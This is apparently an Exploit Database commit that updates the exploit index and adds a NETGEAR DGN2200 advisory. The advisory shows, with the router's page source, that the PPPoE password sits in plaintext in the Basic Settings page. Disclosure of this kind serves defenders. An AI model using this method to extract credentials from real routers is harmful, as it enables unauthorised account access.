Updated 07_26_2014

This commit is contained in:
Offensive Security 2014-07-26 04:37:24 +00:00
parent 8041bf2c96
commit 0cca3dcc6f
12 changed files with 1927 additions and 3 deletions


@ -17504,7 +17504,7 @@ id,file,description,date,author,platform,type,port
20201,platforms/linux/local/20201.c,"Nvidia Linux Driver Privilege Escalation",2012-08-02,anonymous,linux,local,0
20202,platforms/windows/remote/20202.rb,"Cisco Linksys PlayerPT ActiveX Control SetSource sURL argument Buffer Overflow",2012-08-03,metasploit,windows,remote,0
20204,platforms/windows/remote/20204.rb,"Dell SonicWALL Scrutinizer 9 SQL Injection",2012-08-03,metasploit,windows,remote,0
20205,platforms/unix/remote/20205.rb,"Zenoss 3 showDaemonXMLConfig Command Execution",2012-08-03,metasploit,unix,remote,8080
20205,platforms/unix/remote/20205.rb,"Zenoss 3 - showDaemonXMLConfig Command Execution",2012-08-03,metasploit,unix,remote,8080
20206,platforms/multiple/remote/20206.txt,"QSSL Voyager 2.0 1B Arbitrary File Access",2000-09-01,neonbunny,multiple,remote,0
20207,platforms/multiple/remote/20207.txt,"QSSL Voyager 2.0 1B .photon Directory Information Disclosure",2000-09-01,neonbunny,multiple,remote,0
20208,platforms/php/webapps/20208.txt,"nathan purciful phpphotoalbum 0.9.9 - Directory Traversal vulnerability",2000-09-07,pestilence,php,webapps,0
@ -30190,7 +30190,7 @@ id,file,description,date,author,platform,type,port
33508,platforms/linux/local/33508.txt,"GNU Bash <= 4.0 'ls' Control Character Command Injection Vulnerability",2010-01-13,"Eric Piel",linux,local,0
33509,platforms/php/webapps/33509.txt,"Joomla! 'com_tienda' Component 'categoria' Parameter Cross-Site Scripting Vulnerability",2010-01-13,FL0RiX,php,webapps,0
33510,platforms/php/webapps/33510.txt,"Tribisur 'cat' Parameter Cross Site Scripting Vulnerability",2010-01-13,"ViRuSMaN ",php,webapps,0
33511,platforms/multiple/webapps/33511.txt,"Zenoss 2.3.3 Multiple SQL Injection Vulnerabilities",2010-01-14,"nGenuity Information Services",multiple,webapps,0
33511,platforms/multiple/webapps/33511.txt,"Zenoss 2.3.3 - Multiple SQL Injection Vulnerabilities",2010-01-14,"nGenuity Information Services",multiple,webapps,0
33514,platforms/php/webapps/33514.txt,"Videos Tube 1.0 - Multiple SQL Injection Vulnerabilities",2014-05-26,"Mustafa ALTINKAYNAK",php,webapps,80
33516,platforms/linux/local/33516.txt,"Linux kernel 3.14-rc1 <= 3.15-rc4 - Raw Mode PTY Local Echo Race Condition (x64) Local Privilege Escalation",2014-05-26,"Matthew Daley",linux,local,0
33518,platforms/hardware/webapps/33518.txt,"Zyxel P-660HW-T1 v3 Wireless Router - CSRF Vulnerability",2014-05-26,"Mustafa ALTINKAYNAK",hardware,webapps,80
@ -30209,7 +30209,7 @@ id,file,description,date,author,platform,type,port
33533,platforms/windows/dos/33533.html,"Gracenote CDDBControl ActiveX Control 'ViewProfile' Method Heap Buffer Overflow Vulnerability",2010-01-18,karak0rsan,windows,dos,0
33534,platforms/php/webapps/33534.txt,"TestLink <= 1.8.5 'order_by_login_dir' Parameter Cross Site Scripting Vulnerability",2010-01-18,"Prashant Khandelwal",php,webapps,0
33535,platforms/linux/remote/33535.txt,"SystemTap 1.0 'stat-server' Remote Arbitrary Command Injection Vulnerability",2010-01-15,"Frank Ch. Eigler",linux,remote,0
33536,platforms/multiple/remote/33536.txt,"Zenoss 2.3.3 Multiple Cross Site Request Forgery Vulnerabilities",2010-01-18,"Adam Baldwin",multiple,remote,0
33536,platforms/multiple/remote/33536.txt,"Zenoss 2.3.3 - Multiple Cross Site Request Forgery Vulnerabilities",2010-01-18,"Adam Baldwin",multiple,remote,0
33538,platforms/windows/remote/33538.py,"Easy File Sharing FTP Server 3.5 - Stack Buffer Overflow",2014-05-27,superkojiman,windows,remote,21
33540,platforms/windows/remote/33540.txt,"SurgeFTP 2.x 'surgeftpmgr.cgi' Multiple Cross Site Scripting Vulnerabilities",2010-01-18,indoushka,windows,remote,0
33541,platforms/php/webapps/33541.txt,"DataLife Engine 8.3 engine/inc/include/init.php selected_language Parameter Remote File Inclusion",2010-01-19,indoushka,php,webapps,0
@ -30756,8 +30756,19 @@ id,file,description,date,author,platform,type,port
34146,platforms/php/webapps/34146.txt,"Sell@Site PHP Online Jobs Login Multiple SQL Injection Vulnerabilities",2010-06-15,"L0rd CrusAd3r",php,webapps,0
34147,platforms/php/webapps/34147.txt,"JForum 2.1.8 'username' Parameter Cross Site Scripting Vulnerability",2010-06-06,"Adam Baldwin",php,webapps,0
34148,platforms/multiple/webapps/34148.TXT,"Barracuda Networks #35 Web Firewall 610 6.0.1 - Filter Bypass & Persistent Vulnerability",2014-07-23,Vulnerability-Lab,multiple,webapps,0
34149,platforms/hardware/webapps/34149.txt,"NETGEAR DGN2200 1.0.0.29_1.7.29_HotS - Password Disclosure vulnerability",2014-07-23,"Dolev Farhi",hardware,webapps,0
34151,platforms/windows/dos/34151.txt,"Adobe SVG Viewer 3.0 - Circle Transform Remote Code Execution Vulnerability",2010-06-16,h07,windows,dos,0
34152,platforms/linux/remote/34152.txt,"CUPS <= 1.4.2 Web Interface Information Disclosure Vulnerability",2010-06-15,"Luca Carettoni",linux,remote,0
34153,platforms/php/webapps/34153.txt,"2daybiz Network Community Script SQL Injection and Cross Site Scripting Vulnerabilities",2010-06-16,Sid3^effects,php,webapps,0
34154,platforms/php/webapps/34154.txt,"Software Index 'signinform.php' Cross-Site Scripting Vulnerability",2010-06-27,indoushka,php,webapps,0
34155,platforms/php/webapps/34155.txt,"Ceica-GW 'login.php' Cross Site Scripting Vulnerability",2010-06-27,indoushka,php,webapps,0
34156,platforms/windows/remote/34156.pl,"TurboFTP Server <= 1.20.745 Directory Traversal Vulnerability",2010-06-17,leinakesi,windows,remote,0
34157,platforms/php/webapps/34157.txt,"Firebook Multiple Cross Site Scripting and Directory Traversal Vulnerabilities",2010-06-17,MustLive,php,webapps,0
34158,platforms/windows/dos/34158.txt,"Chrome Engine 4 - Denial Of Service Vulnerability",2010-06-17,"Luigi Auriemma",windows,dos,0
34159,platforms/php/webapps/34159.txt,"Gallery XML Joomla! Component 1.1 SQL Injection and Local File Include Vulnerabilities",2010-06-18,jdc,php,webapps,0
34160,platforms/php/remote/34160.txt,"Omeka 2.2.1 - Remote Code Execution Exploit",2014-07-24,LiquidWorm,php,remote,80
34161,platforms/php/webapps/34161.txt,"Wordpress Video Gallery Plugin 2.5 - Multiple Vulnerabilities",2014-07-24,"Claudio Viviani",php,webapps,80
34162,platforms/windows/dos/34162.py,"BulletProof FTP Client 2010 - Buffer Overflow (SEH)",2014-07-24,"Gabor Seljan",windows,dos,0
34163,platforms/hardware/webapps/34163.txt,"Lian Li NAS - Multiple Vulnerabilities",2014-07-24,pws,hardware,webapps,0
34164,platforms/linux/dos/34164.pl,"Make 3.81 - Heap Overflow PoC",2014-07-24,HyP,linux,dos,0
34165,platforms/multiple/webapps/34165.txt,"Zenoss Monitoring System 4.2.5-2108 64bit - Stored XSS",2014-07-25,"Dolev Farhi",multiple,webapps,0
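Review bot: The new entry on the `34148,platforms/multiple/webapps/34148.TXT` line is the only path in this hunk with an upper-case extension, and on a case-sensitive filesystem the index will resolve it only if the file really was committed as `34148.TXT`; if it was not, the path should read `platforms/multiple/webapps/34148.txt`. The three Zenoss title rewrites in the earlier hunks normalise to the `Product Version - Description` form, yet the newly added `NETGEAR DGN2200 1.0.0.29_1.7.29_HotS - Password Disclosure vulnerability` keeps a lower-case trailing `vulnerability`, which the same pass could have capitalised for consistency with the lines just edited.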



@ -0,0 +1,827 @@
# Exploit Title: Password Disclosure vulnerability
# Software: NETGEAR DGN2200
# Software Link: netgear.com
# Version: DGN2200
# Author: Dolev Farhi, email: dolev(at)openflare(dot)org
# Date: 23.7.2014
# Tested on: Kali Linux
# Firmware 1.0.0.29_1.7.29_HotS
2. Vulnerability Description:
===============================
An attacker is able to extract sensitive information such as the password from the Basic Settings router page due to storing it in plaintext.
3. Steps to reproduce:
======================
Navigate to the Basic Settings page, right click in the browser -> view source/frame
html>
<head>
<META name="description" content="DGN2200v2BEZEQ">
<META http-equiv="Content-Type" content="text/html; charset=utf-8">
<META http-equiv="Content-Style-Type" content="text/css">
<META http-equiv="Pragma" content="no-cache">
<META HTTP-equiv="Cache-Control" content="no-cache">
<META HTTP-EQUIV="Expires" CONTENT="Mon, 06 Jan 1990 00:00:01 GMT">
<title>PPPoE</title>
<link rel="stylesheet" href="form.css">
<STYLE TYPE="text/javascript">
classes.num.all.fontFamily = "Courier";
classes.num.all.fontSize = "10pt" ;
</style>
<script language="javascript" type="text/javascript" src="func.js"></script>
<script language="javascript" type="text/javascript" src="msg.js"></script>
<script language="javascript" type="text/javascript" src="utility.js"></script>
<script language="javascript" type="text/javascript" src="browser.js"></script>
<script language="javascript" type="text/javascript" src="md5.js"></script>
<script language="javascript" type="text/javascript">
var DisableFixedIP = false;
var DisableFixedDNS = false;
var all_wan_proto = new Array(8);
var all_pppoe_localip = new Array(8);
var all_wan_dns_sel = new Array(8);
var all_wan_dns1_pri = new Array(8);
var all_wan_dns1_sec = new Array(8);
var all_wan_nat = new Array(8);
var all_wan_fw = new Array(8);
var all_ppp_dod = new Array(8);
var all_pppoe_idletime = new Array(8);
var all_pppoe_username = new Array(8);
var all_pppoe_passwd = new Array(8);
var all_pppoe_servicename = new Array(8);
var all_is_static_ip = new Array(8);
var all_wan_isbridge = new Array(8);
function loadMultiWanInfo()
{
var cf = document.forms[0];
cf.adslChoice.selectedIndex = cf.nowchoice.value;
all_wan_proto[0] = "pppoe";
all_wan_proto[1] = "pppoe";
all_wan_proto[2] = "pppoe";
all_wan_proto[3] = "pppoe";
all_wan_proto[4] = "pppoe";
all_wan_proto[5] = "pppoe";
all_wan_proto[6] = "pppoe";
all_wan_proto[7] = "pppoe";
all_pppoe_localip[0] = "ip.add.re.ss";
all_pppoe_localip[1] = "0.0.0.0";
all_pppoe_localip[2] = "0.0.0.0";
all_pppoe_localip[3] = "0.0.0.0";
all_pppoe_localip[4] = "0.0.0.0";
all_pppoe_localip[5] = "0.0.0.0";
all_pppoe_localip[6] = "0.0.0.0";
all_pppoe_localip[7] = "0.0.0.0";
all_ppp_dod[0] = 0;
all_ppp_dod[1] = 0;
all_ppp_dod[2] = 0;
all_ppp_dod[3] = 0;
all_ppp_dod[4] = 0;
all_ppp_dod[5] = 0;
all_ppp_dod[6] = 0;
all_ppp_dod[7] = 0;
all_pppoe_idletime[0] = 0 / 60;
all_pppoe_idletime[1] = 0 / 60;
all_pppoe_idletime[2] = 0 / 60;
all_pppoe_idletime[3] = 0 / 60;
all_pppoe_idletime[4] = 0 / 60;
all_pppoe_idletime[5] = 0 / 60;
all_pppoe_idletime[6] = 0 / 60;
all_pppoe_idletime[7] = 0 / 60;
all_wan_dns_sel[0] = "0";
all_wan_dns_sel[1] = "0";
all_wan_dns_sel[2] = "0";
all_wan_dns_sel[3] = "0";
all_wan_dns_sel[4] = "0";
all_wan_dns_sel[5] = "0";
all_wan_dns_sel[6] = "0";
all_wan_dns_sel[7] = "0";
all_wan_dns1_pri[0] = "80.179.52.100";
all_wan_dns1_pri[1] = "";
all_wan_dns1_pri[2] = "";
all_wan_dns1_pri[3] = "";
all_wan_dns1_pri[4] = "";
all_wan_dns1_pri[5] = "";
all_wan_dns1_pri[6] = "";
all_wan_dns1_pri[7] = "";
all_wan_dns1_sec[0] = "80.179.55.100";
all_wan_dns1_sec[1] = "";
all_wan_dns1_sec[2] = "";
all_wan_dns1_sec[3] = "";
all_wan_dns1_sec[4] = "";
all_wan_dns1_sec[5] = "";
all_wan_dns1_sec[6] = "";
all_wan_dns1_sec[7] = "";
all_wan_nat[0] = "1";
all_wan_nat[1] = "1";
all_wan_nat[2] = "1";
all_wan_nat[3] = "1";
all_wan_nat[4] = "1";
all_wan_nat[5] = "1";
all_wan_nat[6] = "1";
all_wan_nat[7] = "1";
all_wan_fw[0] = "1";
all_wan_fw[1] = "1";
all_wan_fw[2] = "1";
all_wan_fw[3] = "1";
all_wan_fw[4] = "1";
all_wan_fw[5] = "1";
all_wan_fw[6] = "1";
all_wan_fw[7] = "1";
all_pppoe_username[0] = "user@012ISP";
all_pppoe_username[1] = "";
all_pppoe_username[2] = "";
all_pppoe_username[3] = "";
all_pppoe_username[4] = "";
all_pppoe_username[5] = "";
all_pppoe_username[6] = "";
all_pppoe_username[7] = "";
all_pppoe_passwd[0] = "MyPassword"; <--- password
all_pppoe_passwd[1] = "";
all_pppoe_passwd[2] = "";
all_pppoe_passwd[3] = "";
all_pppoe_passwd[4] = "";
all_pppoe_passwd[5] = "";
all_pppoe_passwd[6] = "";
all_pppoe_passwd[7] = "";
all_pppoe_servicename[0] = "";
all_pppoe_servicename[1] = "";
all_pppoe_servicename[2] = "";
all_pppoe_servicename[3] = "";
all_pppoe_servicename[4] = "";
all_pppoe_servicename[5] = "";
all_pppoe_servicename[6] = "";
all_pppoe_servicename[7] = "";
all_is_static_ip[0] = "0";
all_is_static_ip[1] = "0";
all_is_static_ip[2] = "0";
all_is_static_ip[3] = "0";
all_is_static_ip[4] = "0";
all_is_static_ip[5] = "0";
all_is_static_ip[6] = "0";
all_is_static_ip[7] = "0";
all_wan_isbridge[0] = "0";
all_wan_isbridge[1] = "0";
all_wan_isbridge[2] = "0";
all_wan_isbridge[3] = "0";
all_wan_isbridge[4] = "0";
all_wan_isbridge[5] = "0";
all_wan_isbridge[6] = "0";
all_wan_isbridge[7] = "0";
}
function goTestApply()
{
var winoptions = "width=640,height=480,menubar=yes,toolbar=yes,status=yes,location=yes,resizable=yes";
if(document.forms[0].runtest.value == "yes")
openDataSubWin('wtest.htm',winoptions);
}
function ChangeAdslChoice()
{
var cf = document.forms[0];
var index = cf.adslChoice.selectedIndex;
var wan_proto = all_wan_proto[index];
if (wan_proto == "dhcp" || wan_proto == "ipoa"
|| wan_proto == "mer" || wan_proto == "static" )
doTypeChange2(0);
else if (wan_proto == "pppoe")
doTypeChange2(1);
else
doTypeChange2(2);
// loadSettings(index);
// loadcheck();
}
function doTypeChange2(newIndex)
{
var tmpstr;
var cf = document.forms[0];
var index = cf.adslChoice.selectedIndex;
if (newIndex == 0)
{
tmpstr = "ether_m.cgi?nowchoice=" + index + "&nowproto=0";
location.href = tmpstr;
}
else if (newIndex == 1)
{
tmpstr = "pppoe_m.cgi?nowchoice=" + index+ "&nowproto=1";
location.href = tmpstr;
}
else if (newIndex == 2)
{
tmpstr = "pppoa_m.cgi?nowchoice=" + index+ "&nowproto=1";
location.href = tmpstr;
}
}
function doTypeChange3(newIndex)
{
var tmpstr;
var cf = document.forms[0];
var index = cf.adslChoice.selectedIndex;
var mux = cf.dsl_multiplex.value;
var vpi = cf.dsl_vpi.value;
var vci = cf.dsl_vci.value;
var msg = "";
if( isNumeric(cf.dsl_vpi, 255) )
msg = "VPI contains an invalid number"
if( isNumeric(cf.dsl_vci, 65536) )
msg = "VC contains an invalid number"
if (vpi < 0 || vpi > 255)
msg = "VPI is out of range [0~255]"
if (vci < 32 || vci > 65535)
msg = "VC is out of range [32~65535]"
if (msg.length > 1)
{
alert(msg);
return false;
}
if (newIndex == 0)
{
tmpstr="ether_m.cgi?nowchoice="+index+"&havetmpvar=1&gui_mode=1&tmpmux="+mux+"&tmpvpi="+vpi+"&tmpvci="+vci;
location.href = tmpstr;
}
else if (newIndex == 1)
{
tmpstr="pppoe_m.cgi?nowchoice="+index+"&havetmpvar=1&gui_mode=1&tmpmux="+mux+"&tmpvpi="+vpi+"&tmpvci="+vci;
location.href = tmpstr;
}
}
function setServer()
{
var cf = document.forms[0];
var stype = cf.login_type.selectedIndex;
var tmpstr;
var index = cf.adslChoice.selectedIndex;
var mux = cf.dsl_multiplex.value;
var vpi = cf.dsl_vpi.value;
var vci = cf.dsl_vci.value;
var msg = "";
if( isNumeric(cf.dsl_vpi, 255) )
msg = "VPI contains an invalid number"
if( isNumeric(cf.dsl_vci, 65536) )
msg = "VC contains an invalid number"
if (vpi < 0 || vpi > 255)
msg = "VPI is out of range [0~255]"
if (vci < 32 || vci > 65535)
msg = "VC is out of range [32~65535]"
if (msg.length > 1)
{
alert(msg);
return false;
}
if(stype==0) //pppoe
{
tmpstr="pppoe_m.cgi?nowchoice="+index+"&havetmpvar=1&gui_mode=1&tmpmux="+mux+"&tmpvpi="+vpi+"&tmpvci="+vci;
location.href = tmpstr;
}
else if(stype==1) //pppoa
{
tmpstr="pppoa_m.cgi?nowchoice="+index+"&havetmpvar=1&gui_mode=1&tmpmux="+mux+"&tmpvpi="+vpi+"&tmpvci="+vci;
location.href = tmpstr;
}
}
function loadcheck()
{
var cf = document.forms[0];
if (isIE())
{
cf.pppoe_username.size="24";
cf.pppoe_passwd.size="24";
}
loadhelp('BAS_mpppoe');
setIP();
setDNS();
}
function setIP()
{
var cf = document.forms[0];
var dflag = cf.WANAssign[0].checked;
setDisabled(dflag,cf.WPethr1,cf.WPethr2,cf.WPethr3,cf.WPethr4);
if (cf.WANAssign[1].checked)
{
cf.DNSAssign[1].checked = true;
setDNS();
}
DisableFixedIP = dflag;
}
function setDNS()
{
var cf = document.forms[0];
var dflag = cf.DNSAssign[0].checked;
if (cf.WANAssign[1].checked && cf.DNSAssign[0].checked)
{
cf.DNSAssign[1].checked=true;
dflag = false;
}
setDisabled(dflag,cf.DAddr1,cf.DAddr2,cf.DAddr3,cf.DAddr4,cf.PDAddr1,cf.PDAddr2,cf.PDAddr3,cf.PDAddr4);
DisableFixedDNS = dflag;
}
function checkData()
{
var cf = document.forms[0];
var msg = "";
var vpi = cf.dsl_vpi.value;
var vci = cf.dsl_vci.value;
if( isNumeric(cf.dsl_vpi, 255) )
msg = "VPI contains an invalid number"
if( isNumeric(cf.dsl_vci, 65536) )
msg = "VC contains an invalid number"
if (vpi < 0 || vpi > 255)
msg = "VPI is out of range [0~255]"
if (vci < 32 || vci > 65535)
msg = "VC is out of range [32~65535]"
msg+= checkBlank(cf.pppoe_username, "User name");
if(cf.pppoe_idletime.value.length<=0)
msg+= "Please enter idle time.\n";
else if(!_isNumeric(cf.pppoe_idletime.value))
msg+= "Invalid idle time,please enter proper numeral.\n";
if(cf.WANAssign[1].checked)
{
if(checkIP(cf.WPethr1,cf.WPethr2,cf.WPethr3,cf.WPethr4,254)||(parseInt(cf.WPethr4.value)==0))
msg+= "Invalid static IP address.\n";
cf.pppoe_localip.value = cf.WPethr1.value+'.'+cf.WPethr2.value+'.'+cf.WPethr3.value+'.'+cf.WPethr4.value;
}
else
cf.pppoe_localip.value = "0.0.0.0";
if(cf.DNSAssign[1].checked)
{
if(checkIP(cf.DAddr1,cf.DAddr2,cf.DAddr3,cf.DAddr4,254)||(parseInt(cf.DAddr4.value)==0))
msg+= "Invalid Primary DNS Address, please enter again.\n";
if(cf.PDAddr1.value.length>0)
if(checkIP(cf.PDAddr1,cf.PDAddr2,cf.PDAddr3,cf.PDAddr4,254)||(parseInt(cf.PDAddr4.value)==0))
msg+= "Invalid Secondary DNS Address, please enter again.\n";
}
if (duplicatepvcChk(vpi,vci))
msg += "duplicate PVC found!\n";
if (msg.length > 1)
{
alert(msg);
return false;
}
cf.wan_dns1_pri.value = cf.DAddr1.value+'.'+cf.DAddr2.value+'.'+cf.DAddr3.value+'.'+cf.DAddr4.value;
cf.wan_dns1_sec.value = cf.PDAddr1.value+'.'+cf.PDAddr2.value+'.'+cf.PDAddr3.value+'.'+cf.PDAddr4.value;
cf.nowchoice.value = -1;
return true;
}
function duplicatepvcChk(vpi, vci)
{
var cf = document.forms[0];
var index = cf.adslChoice.selectedIndex;
if (( index != 0) && (vpi == cf.atm0_vpi.value) && (vci == cf.atm0_vci.value) && (cf.wan0_dial.value == "1"))
return true;
if ((index != 1) && (vpi == cf.atm1_vpi.value) && (vci == cf.atm1_vci.value) && (cf.wan1_dial.value == "1"))
return true;
if ((index != 2) && (vpi == cf.atm2_vpi.value) && (vci == cf.atm2_vci.value) && (cf.wan2_dial.value == "1"))
return true;
if ((index != 3) && (vpi == cf.atm3_vpi.value) && (vci == cf.atm3_vci.value) && (cf.wan3_dial.value == "1"))
return true;
if ((index != 4) && (vpi == cf.atm4_vpi.value) && (vci == cf.atm4_vci.value) && (cf.wan4_dial.value == "1"))
return true;
if ((index != 5) && (vpi == cf.atm5_vpi.value) && (vci == cf.atm5_vci.value) && (cf.wan5_dial.value == "1"))
return true;
if ((index != 6) && (vpi == cf.atm6_vpi.value) && (vci == cf.atm6_vci.value) && (cf.wan6_dial.value == "1"))
return true;
if ((index != 7) && (vpi == cf.atm7_vpi.value) && (vci == cf.atm7_vci.value) && (cf.wan7_dial.value == "1"))
return true;
return false;
}
function resetPvc()
{
window.location.href="BAS_mpppoe.htm";
}
function loadSettings(index)
{
var cf = document.forms[0];
var pppoe_localip;
var wan_dns1_pri;
var wan_dns1_sec;
var tmp;
var wan_proto;
var dod;
if (index == 100)
index = eval(cf.nowchoice.value);
loadvpivci(index);
wan_proto = all_wan_proto[index];
if (all_pppoe_localip[index].length!=0)
{
pppoe_localip=all_pppoe_localip[index].split(".");
cf.WPethr1.value = pppoe_localip[0];
cf.WPethr2.value = pppoe_localip[1];
cf.WPethr3.value = pppoe_localip[2];
cf.WPethr4.value = pppoe_localip[3];
}
var wan_dns_sel = all_wan_dns_sel[index];
if ( all_wan_dns1_pri[index].length!=0 )
{
wan_dns1_pri = all_wan_dns1_pri[index].split(".");
cf.DAddr1.value = wan_dns1_pri[0];
cf.DAddr2.value = wan_dns1_pri[1];
cf.DAddr3.value = wan_dns1_pri[2];
cf.DAddr4.value = wan_dns1_pri[3];
}
if ( all_wan_dns1_sec[index].length!=0 )
{
wan_dns1_sec = all_wan_dns1_sec[index].split(".");
cf.PDAddr1.value = wan_dns1_sec[0];
cf.PDAddr2.value = wan_dns1_sec[1];
cf.PDAddr3.value = wan_dns1_sec[2];
cf.PDAddr4.value = wan_dns1_sec[3];
}
cf.pppoe_idletime.value = all_pppoe_idletime[index];
if (all_ppp_dod[index] == 2)
cf.pppoe_idletime.disabled = true;
else
cf.pppoe_idletime.disabled = false;
//if (all_pppoe_localip[index]=="0.0.0.0")
// cf.WANAssign[0].checked = true;
//else
// cf.WANAssign[1].checked = true;
if (all_is_static_ip[index] == 1)//static ip
cf.WANAssign[1].checked = true;
else
cf.WANAssign[0].checked = true;
cf.DNSAssign[wan_dns_sel].checked = true;
if (all_wan_isbridge[index] == 1)
cf.nat_enable[2].checked = true;
else if (all_wan_nat[index] == 1)
cf.nat_enable[0].checked = true;
else
cf.nat_enable[1].checked = true;
cf.pppoe_username.value = all_pppoe_username[index];
cf.pppoe_passwd.value = all_pppoe_passwd[index];
cf.pppoe_servicename.value = all_pppoe_servicename[index];
//water
setIP();
setDNS();
}
function loadvpivci(index)
{
var cf = document.forms[0];
var multiplex;
var vpi;
var vci;
switch(index)
{
case 0:
vpi=cf.atm0_vpi.value;
vci=cf.atm0_vci.value;
multiplex=cf.atm0_encap.value;
break;
case 1:
vpi=cf.atm1_vpi.value;
vci=cf.atm1_vci.value;
multiplex=cf.atm1_encap.value;
break;
case 2:
vpi=cf.atm2_vpi.value;
vci=cf.atm2_vci.value;
multiplex=cf.atm2_encap.value;
break;
case 3:
vpi=cf.atm3_vpi.value;
vci=cf.atm3_vci.value;
multiplex=cf.atm3_encap.value;
break;
case 4:
vpi=cf.atm4_vpi.value;
vci=cf.atm4_vci.value;
multiplex=cf.atm4_encap.value;
break;
case 5:
vpi=cf.atm5_vpi.value;
vci=cf.atm5_vci.value;
multiplex=cf.atm5_encap.value;
break;
case 6:
vpi=cf.atm6_vpi.value;
vci=cf.atm6_vci.value;
multiplex=cf.atm6_encap.value;
break;
case 7:
vpi=cf.atm7_vpi.value;
vci=cf.atm7_vci.value;
multiplex=cf.atm7_encap.value;
break;
}
var tmpvarhave = "";
var tmpmux = "";
var tmpvpi = "";
var tmpvci = "";
if (tmpvarhave == 1)
{
if (multiplex != tmpmux)
cf.cfgChanged.value='1';
if (vpi != tmpvpi)
cf.cfgChanged.value='1';
if (vci != tmpvci)
cf.cfgChanged.value='1';
multiplex = tmpmux;
vpi = tmpvpi;
vci = tmpvci;
}
if (multiplex == "LLC")
cf.dsl_multiplex.selectedIndex = 0;
else
cf.dsl_multiplex.selectedIndex = 1;
cf.dsl_vpi.value=vpi;
cf.dsl_vci.value=vci;
}
function setCfgChanged()
{
var cf = document.forms[0];
cf.cfgChanged.value='1';
}
function checkTest()
{
var cf = document.forms[0];
var ret = checkData();
var winoptions = "width=640,height=480,menubar=yes,toolbar=yes,status=yes,location=yes,resizable=yes";
//var winoptions = "width=400,height=360,status=yes,resizable=yes";
if ( ret == true)
{
if (cf.cfgChanged.value=='0')
{
//openDataSubWin('wtest.htm',winoptions);
//cf.nowchoice.value = 100;
//checkData();
//document.formname.submit();
var tmpstr = "pppoe_m.cgi?nowchoice=100" + "&nowproto=0";
location.href = tmpstr;
//return true;
}
else
{
cf.testpressed.value = '1';
cf.nowchoice.value = -1;
document.formname.submit();
}
}
}
</script>
</head>
<body bgcolor="#ffffff" onload="loadMultiWanInfo();loadSettings(100);loadcheck();goTestApply();">
<form name="formname" method="POST" action="pppoe_m.cgi">
<table border="0" cellpadding="0" cellspacing="3" width="99%">
<tr>
<td colspan="2"><h1>Basic Settings</h1></td>
</tr>
<tr>
<td colspan="2">
<select name="adslChoice" onChange="ChangeAdslChoice();" size="1">
<option value=0>WAN1</option>
</select>
</td>
</tr>
<!-- RULE
<tr>
<td colspan="2" background="liteblue.gif" height="12"> </td>
</tr>
<tr>
<td nowrap width="50%">Multiplexing Method</TD>
<td width="50%" align="right">
<SELECT name="dsl_multiplex" size="1">
<option value="LLC">LLC-BASED</option>
<option value="VC">VC-BASED</option>
</SELECT></TD>
</TR>
<TR>
<td nowrap width="50%">VPI</td>
<td nowrap width="50%" align="right"><input type="text" class="num" name="dsl_vpi" size="3" maxlength="3"></td>
</tr>
<TR>
<td nowrap width="50%">VCI</td>
<td nowrap width="50%" align="right"><input type="text" class="num" name="dsl_vci" size="5" maxlength="5"></td>
</tr>
-->
<INPUT name=dsl_multiplex type=hidden value= "">
<INPUT name=dsl_vpi type=hidden value= "">
<INPUT name=dsl_vci type=hidden value= "">
<tr> <!-- RULE -->
<td colspan="2" background="liteblue.gif" height="12"> </td>
</tr>
<tr>
<td colspan="2">
<p><a href="javascript:loadhelp('BAS_mpppoe','question')" tabindex="-1"><b>Does Your Internet Connection Require A Login?</b></a></p></td>
</tr>
<tr>
<td colspan="2"><input type="radio" checked name="loginreq" value="pppoe" onClick="doTypeChange3(1);">
<a href="javascript:loadhelp('BAS_mpppoe','question')" tabindex="-1">Yes</a></td>
</tr>
<tr>
<td colspan="2"><input type="radio" name="loginreq" value="dhcp" onClick="doTypeChange3(0);">
<a href="javascript:loadhelp('BAS_mpppoe','question')" tabindex="-1">No</a></td>
</tr>
<tr>
<td width="50%"><a href="javascript:loadhelp('BAS_mpppoe','isp')" tabindex="-1"><b>Encapsulation</b></a></td>
<td width="50%" align="right"><select name="login_type" onChange="setServer()"><option>PPPoE (PPP over Ethernet)</option><!-- temp marked by Silver <option>PPPoA (PPP over ATM)</option>--></select></td>
</tr>
<tr> <!-- RULE -->
<td colspan="2" background="liteblue.gif" height="12"> </td>
<tr>
<td><a href="javascript:loadhelp('BAS_mpppoe','login')" tabindex="-1"><b>Login</b></a></td>
<td align="right"><input type="text" name="pppoe_username" size="15" maxlength="60" value="" onChange="setCfgChanged()"></td>
</tr>
<tr>
<td><a href="javascript:loadhelp('BAS_mpppoe','password')" tabindex="-1"><b>Password</b></a></td>
<td align="right"><input type="password" name="pppoe_passwd" size="15" maxlength="50" value="" onChange="setCfgChanged()"></td>
</tr>
<tr>
<td nowrap><a href="javascript:loadhelp('BAS_mpppoe','serv_name')" tabindex="-1"><b>Service Name</b></a> (If Required) </td>
<td align="right"><input type="text" name="pppoe_servicename" maxlength="63" size="15" value="" onChange="setCfgChanged()"></td>
</tr>
<tr>
<td nowrap><a href="javascript:loadhelp('BAS_mpppoe','idletime')" tabindex="-1"><b>Idle Timeout</b></a> (In Minutes)</td>
<td align="right"><input type="text" class="num" name="pppoe_idletime" size="3" maxlength="3" onChange="setCfgChanged()"></td>
</tr>
<tr> <!-- RULE -->
<td colspan="2" background="liteblue.gif" height="12"> </td>
</tr>
<tr>
<td colspan="2"><a href="javascript:loadhelp('BAS_mpppoe','InternetIP')" tabindex="-1"><b>Internet IP Address</b></a></td>
</tr>
<tr>
<td colspan="2"><input type="radio" name="WANAssign" value="Dynamic" onClick="setIP()" onChange="setCfgChanged()">Get Dynamically From ISP</td>
</tr>
<tr>
<td nowrap><input type="radio" name="WANAssign" value="Fixed" onClick="setIP()" onChange="setCfgChanged()">Use Static IP Address</td>
<td align="right" class="num">
<input type="text" name="WPethr1" class="num" size="4" maxlength="3" onFocus="if(DisableFixedIP) this.blur()" onChange="setCfgChanged()">.
<input type="text" name="WPethr2" class="num" size="4" maxlength="3" onFocus="if(DisableFixedIP) this.blur()" onChange="setCfgChanged()">.
<input type="text" name="WPethr3" class="num" size="4" maxlength="3" onFocus="if(DisableFixedIP) this.blur()" onChange="setCfgChanged()">.
<input type="text" name="WPethr4" class="num" size="4" maxlength="3" onFocus="if(DisableFixedIP) this.blur()" onChange="setCfgChanged()"></td>
</tr>
<tr> <!-- RULE -->
<td colspan="2" background="liteblue.gif" height="12"> </td>
</tr>
<tr>
<td colspan="2"><a href="javascript:loadhelp('BAS_mpppoe','DNSaddress')" tabindex="-1"><b>Domain Name Server (DNS) Address </b></a></td>
</tr>
<tr>
<td colspan="2"><input type="radio" name="DNSAssign" value="0" onClick="setDNS()" onChange="setCfgChanged()"> Get Automatically From ISP</td>
